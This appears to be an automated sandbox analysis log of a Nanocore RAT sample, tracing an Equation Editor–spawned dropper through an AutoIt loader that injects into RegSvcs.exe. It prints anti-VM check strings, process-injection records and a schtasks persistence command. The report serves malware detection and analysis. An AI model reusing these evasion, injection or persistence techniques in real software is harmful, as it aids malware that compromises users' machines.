Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Window / User API: threadDelayed 4838	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 7950	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 1761	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: foregroundWindowGot 749	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Window / User API: threadDelayed 3937	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VMwaretray.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VBoxTray.exe_
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VMwareUser.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenAq
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") ThenD6
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") ThenfMf
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VboxService.exex
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VMwareService.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666203454.0000000000914000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenr36\|
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: VBoxTray.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") ThenC
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") ThenU[U
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then48
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: VMwaretray.exek
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Thent7n
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: VboxService.exe

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027D353 VirtualQuery,GetSystemInfo,

4_2_0027D353

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	4_2_0026A2DF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	4_2_0027AFB9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00289FD3 FindFirstFileExA,	4_2_00289FD3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE399B GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00FE399B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	5_2_00FFBCB3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01002408 FindFirstFileW,Sleep,FindNextFileW,FindClose,	5_2_01002408
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00FF280D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01028877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	5_2_01028877
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE1A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00FE1A73
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100CAE7 FindFirstFileW,FindNextFileW,FindClose,	5_2_0100CAE7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100DE7C FindFirstFileW,FindClose,	5_2_0100DE7C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00FFBF17

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FBEE30 LoadLibraryA,GetProcAddress,

5_2_00FBEE30

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00286AF3 mov eax, dword ptr fs:[00000030h]

4_2_00286AF3

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_0027E4F5

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0028ACA1 GetProcessHeap,

4_2_0028ACA1

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0100A35D BlockInput,

5_2_0100A35D

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E643 SetUnhandledExceptionFilter,	4_2_0027E643
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0027E4F5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0027E7FB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00287BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00287BE1
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCF170 SetUnhandledExceptionFilter,	5_2_00FCF170
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCA128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00FCA128
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC7CCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00FC7CCD

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 7EFDE000	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 7EFDE000	Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE43FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

5_2_00FE43FF

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE6C61 LogonUserW,

5_2_00FE6C61

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FBD7A0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,

5_2_00FBD7A0

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE3321 __wcsicoll,mouse_event,__wcsicoll,mouse_event,

5_2_00FE3321

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FF602A GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

5_2_00FF602A

Source: RegSvcs.exe, 00000006.00000002.667114427.0000000002933000.00000004.00000001.sdmp	Binary or memory string: Program Manager48
Source: RegSvcs.exe, 00000006.00000002.667096389.000000000291F000.00000004.00000001.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: mmuiqlcvwo.pif.4.dr	Binary or memory string: IDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
Source: mmuiqlcvwo.pif, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: mmuiqlcvwo.pif, 00000005.00000002.666605322.00000000013F0000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: Program ManagerV
Source: mmuiqlcvwo.pif, 00000005.00000000.479651653.0000000001032000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000000.511159853.0000000001032000.00000002.00020000.sdmp	Binary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
Source: mmuiqlcvwo.pif, 00000005.00000002.666605322.00000000013F0000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp	Binary or memory string: Program Manager<
Source: RegSvcs.exe, 00000006.00000002.667114427.0000000002933000.00000004.00000001.sdmp	Binary or memory string: Program Manager@

Source: C:\Users\Public\vbc.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

4_2_00279D99

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027E34B cpuid

4_2_0027E34B

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027CBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,

4_2_0027CBB8

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FCE284 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

5_2_00FCE284

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_01022BF9 GetUserNameW,

5_2_01022BF9

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0026A995 GetVersionExW,

4_2_0026A995

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

Source: mmuiqlcvwo.pif	Binary or memory string: WIN_XP
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_XPe
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_VISTA
Source: mmuiqlcvwo.pif.4.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte!
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_7
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_8

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: mmuiqlcvwo.pif, 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
